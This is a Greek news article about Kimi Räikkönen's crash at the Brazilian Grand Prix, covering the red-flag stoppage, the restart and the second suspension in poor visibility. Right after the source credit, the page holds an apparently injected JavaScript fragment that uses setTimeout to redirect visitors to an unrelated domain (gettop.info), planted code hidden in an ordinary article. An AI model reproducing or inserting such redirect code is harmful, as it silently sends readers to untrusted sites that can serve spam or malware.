Το τρομακτικό ατύχημα του Ραϊκόνεν στη Βραζιλία (BINTEO)

0
5

 

Διακόπηκε με κόκκινη σημαία το Grand Prix της Βραζιλίας στον 21ο γύρο, όταν το μονοθέσιο του Κίμι Ραϊκόνεν είχε σπινάρισμα, κατέληξε στον τοίχο και διέσχισε την πίστα μέχρι τον απέναντι τοίχο.

Οι πιλότοι που ακολουθούσαν κατάφεραν, ευτυχώς, παρά την πολύ χαμηλή ορατότητα αλλά και την ταχύτητά τους να αποφύγουν τη Ferrari του Φινλανδού (μόνο ο Μάγκνουσεν χτύπησε το φτερό του Ραϊκόνεν) και να αποφευχθεί ένα ίσως μοιραίο ατύχημα.

Οι αγωνοδίκες αποφάσισαν να διακοπεί προσωρινά ο αγώνας που στους επτά πρώτους του γύρους έγινε υπό το αυτοκίνητο ασφαλείας και με τους πιλότους να αντιμετωπίζουν πολύ σοβαρά προβλήματα στον έλεγχο των μονοθεσίων τους. Μέχρι τη στιγμή της διακοπής ο Λιούις Χάμιλτον ήταν πρωτοπόρος, με τον Νίκο Ρόσμπεργκ και τον Μαξ Φερστάπεν να ακολουθούν.

Οι αγωνοδίκες αποφάσισαν τελικά τελικά την επανέναρξη του αγώνα, περίπου 35 λεπτά μετά τη διακοπή του. Διακόπηκε όμως ξανά μετά από έξι γύρους που έγιναν υπό το αυτοκίνητο ασφαλείας, καθώς οι συνθήκες δεν επέτρεπαν τη συνέχισή του.

https://youtu.be/I0YtfmQOfTQ

Πηγή: Sport-fm setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here